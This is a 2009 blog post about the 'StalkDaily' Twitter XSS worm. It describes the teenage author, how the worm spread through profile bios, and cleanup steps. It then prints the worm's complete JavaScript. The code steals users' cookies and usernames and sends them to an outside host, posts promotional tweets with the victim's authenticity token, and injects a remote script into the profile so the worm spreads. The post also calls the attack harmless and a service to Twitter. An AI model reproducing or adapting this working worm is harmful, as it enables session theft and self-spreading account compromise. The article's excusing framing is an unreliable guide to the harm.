As many people have become aware of, a Twiter worm broke loose on Saturday, April 11th, which became known as the “Stalk Daily Worm.” The creator of website StalkDaily.com, 17 year old Mikeyy Mooney, you can contact mikeyy by email “admin@stalkdaily.com“Came clean Saturday evening, in an interview with BNO News. He stated that he created the worm simply out of boredom, a common theme in malicious computer code. He admitted to having an interest in finding vulnerabilities on sites. He did in fact bring light to a Cross Site Scripting (XSS) flaw, that could have been used much more maliciously. The kid did a service by letting Twitter see the problem in their code, and he got some free advertising for his own website in the process. He says that the code did not steal any sensitive data, or passwords. Examining the code seemed to support his claim, the script grabbed the user’s twitter cookies to make use of Twitter’s API, but no computers were compromised, no accounts were used to steal financial information, no one’s computer was sending cryptic communications to missile silos.
He started by making several accounts, with the worm code embedded into the Bio section on the profiles, the fact this was allowed was the XSS bug he brought to light. Unlike other worms, where you are safe if you don’t click suspicious links, this worm worked by just viewing the infected profile. The script waited for three seconds, before taking the user’s cookies. After which, the worm would add itself into the target’s Bio section, and send out Tweets linking to Mooney’s site. No damage, no ruined finances, just a worm being exposed to the public.
Above Article By Cody Skinner
NOTE- YOU CAN CHECK HERE STATUS OF TWITTER http://status.twitter.com/
If you’re affected, What to do:
1. Go to your Twitter account settings and switch your bio back to normal
2. In your browser settings, clear out your cookies and cache
3. Change your Twitter password
To prevent re-infection, What to do:
1. Avoid visiting Twitter profiles until the issue is fixed
2. If you do land on a Twitter profile with StalkDaily as the URL, you have 3 seconds to close the tab before you’re affected!
3. Since these attacks only work when visiting Twitter profiles on the web, you might want to consider using a desktop Twitter client like Tweet Deck or Seesmic Desktop.
This is the Javascript coded by Mikeyy Mooney, the 17 years-old teenager
function XHConn() { var xmlhttp, bComplete = false; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp = false; }}} if (!xmlhttp) return null; this.connect = function(sURL, sMethod, sVars, fnDone) { if (!xmlhttp) return false; bComplete = false; sMethod = sMethod.toUpperCase(); try { if (sMethod == "GET") { xmlhttp.open(sMethod, sURL+"?"+sVars, true); sVars = ""; } else { xmlhttp.open(sMethod, sURL, true); xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1"); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); } xmlhttp.onreadystatechange = function(){ if (xmlhttp.readyState == 4 && !bComplete) { bComplete = true; fnDone(xmlhttp); }}; xmlhttp.send(sVars); } catch(z) { return false; } return true; }; return this; } function urlencode( str ) { var histogram = {}, tmp_arr = []; var ret = str.toString(); var replacer = function(search, replace, str) { var tmp_arr = []; tmp_arr = str.split(search); return tmp_arr.join(replace); }; histogram["'"] = '%27'; histogram['('] = '%28'; histogram[')'] = '%29'; histogram['*'] = '%2A'; histogram['~'] = '%7E'; histogram['!'] = '%21'; histogram['%20'] = '+'; ret = encodeURIComponent(ret); for (search in histogram) { replace = histogram[search]; ret = replacer(search, replace, ret) } return ret.replace(/(%([a-z0-9]{2}))/g, function(full, m1, m2) { return "%"+m2.toUpperCase(); }); return ret; } var content = document.documentElement.innerHTML; userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g); var username = userreg.exec(content); username = username[1]; var cookie; cookie = urlencode(document.cookie); document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");---/The worm steals your cookie document.write("<img src='http://stalkdaily.com/log.gif'/>"); function wait() { var content = document.documentElement.innerHTML; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g); var authtoken = authreg.exec(content); authtoken = authtoken[1]; //alert(authtoken); var randomUpdate=new Array(); randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?"; randomUpdate[1]="Join www.StalkDaily.com everyone!"; randomUpdate[2]="Woooo, www.StalkDaily.com"; randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!"; randomUpdate[4]="Wow...www.StalkDaily.com"; randomUpdate[5]="@twitter www.StalkDaily.com"; var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)]; updateEncode = urlencode(genRand); var xss = urlencode('http://www.stalkdaily.com"><script src="http://mikeyylolz.uuuq.com/x.js"></script><a '); var ajaxConn = new XHConn(); ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update"); ---/Makes you post a funny status var ajaxConn1 = new XHConn(); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update"); ---/Infects your account} setTimeout("wait()",3250);
No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.
June 22nd, 2009 at 11:59 PM
?»?
Great Post. You find most blog posts littered with rubbish nowadays,
however this has been a very informative post.